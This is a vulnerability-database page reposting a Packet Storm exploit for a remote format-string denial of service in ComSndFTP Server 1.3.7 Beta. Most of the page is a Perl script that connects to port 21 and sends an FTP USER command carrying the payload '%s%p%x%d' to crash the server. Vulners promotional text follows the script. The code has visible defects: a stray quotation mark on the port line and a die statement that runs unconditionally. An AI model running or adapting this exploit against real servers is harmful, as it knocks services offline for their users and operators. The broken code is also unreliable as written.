Lucene search
K

ComSndFTP Server 1.3.7 Beta Denial Of Service

🗓️ 02 Feb 2024 00:00:00Reported by Fernando MengaliType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 280 Views

ComSndFTP Server 1.3.7 Beta Denial Of Service - Remote Format String DoS

Code
`#!/usr/bin/perl  
# ComSndFTP Server Remote Format String Denial of Service (DoS)  
  
use strict;  
use warnings;  
use IO::Socket;  
  
$| = 1;  
  
my $host = "192.168.172.136";  
my $port = "21"";  
  
my $payload = '%s%p%x%d';  
  
print "Connecting... ";  
  
my $sock = IO::Socket::INET->new(  
PeerAddr => $host,  
PeerPort => $port,  
Proto => 'tcp',  
Timeout => 30  
);  
  
die "Unable to connect \n";  
  
$sock->recv(my $content, 100, 0);  
sleep(2);  
  
$sock->send("USER $payload\r\n", 0);  
sleep(2);  
  
$sock->recv($content, 100, 0);  
sleep(5);  
  
$sock->close;  
  
print "Denial Of Service completed!\n";  
exit(0);  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Feb 2024 00:00Current
7.4High risk
Vulners AI Score7.4
280